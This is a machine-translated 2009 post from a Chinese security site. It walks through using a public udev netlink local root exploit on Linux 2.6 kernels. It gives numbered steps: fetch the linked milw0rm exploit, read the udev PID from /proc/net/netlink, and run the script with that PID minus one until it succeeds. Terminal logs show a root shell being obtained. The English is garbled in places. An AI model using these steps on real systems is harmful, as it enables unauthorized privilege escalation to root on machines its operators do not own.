UDEV local overflow exploit hand-vulnerability warning-the black bar safety net

2009-06-07T00:00:00
ID MYHACK58:62200923470
Type myhack58
Reporter 佚名
Modified 2009-06-07T00:00:00

Description

Authors: professional owe money This time UDEV overflow vulnerability is to fire, on the virtual machine do the following test and found that indeed very easy to use. Looks like a pass to kill a wide range of

1. <Http://www.milw0rm.com/exploits/8478> saved as a shell file, you can also casually named, for example, I later named a

2. Find udev the first socket of the PID, you can execute the following command to obtain: cat /proc/net/netlink

3. Will appear in the first line of the PID minus 1, as a parameter, for example sk Eth Pid Groups Rmem Wmem Dump Locks cfe9ce00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

This PID is 0, subtract 1 to get-1

4. sh a -1 if FAILED, multiple execution times)

The following is a successful presentation I have failed N times, would have thought that the system is not affected, and later heard that 2. 6 cores are affected, so try a few times, suddenly see a cute#excited)

bt tmp $ cat /proc/net/netlink sk Eth Pid Groups Rmem Wmem Dump Locks cfe9ce00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 cf8f3800 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 cfa96400 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 cfe13000 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 cff57c00 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 cfe9cc00 1 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 cff57600 1 5 1 0 6 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 2 c12a3000 1 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 c12a3200 1 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 bt tmp $ sh a -1 suid. c: In function 'main': suid. c:3: warning: incompatible implicit declaration of built-in function 'execl' /usr/lib/gcc/i486-slackware-linux/4.1.2/../../../../i486-slackware-linux/bin/ld: cannot open output file /tmp/suid: Permission denied collect2: ld returned 1 exit status cp: libno_ex. so. 1. 0' and/tmp/libno_ex. so. 1. 0' are the same file sh-3.1# id uid=0(root) gid=0(root) groups=1 0(wheel) sh-3.1# uname-a Linux bt 2.6.21.5 #4 SMP Thu Apr 1 0 0 4:2 3:5 6 GMT 2 0 0 8 i686 Intel(R) Pentium(R) Dual CPU E2140 @ 1.60 GHz GenuineIntel GNU/Linux

------------------------Depressed the dividing line----------------------------------------------------------------------

And later repeated the test dozens of times, in order to be successful once.

bt test $ bash b -1 suid. c: In function 'main': suid. c:3: warning: incompatible implicit declaration of built-in function 'execl' sh-3.1$ exit-----------> failed again exit bt test $ bash b -1 suid. c: In function 'main': suid. c:3: warning: incompatible implicit declaration of built-in function 'execl' sh-3.1# ---------------> successful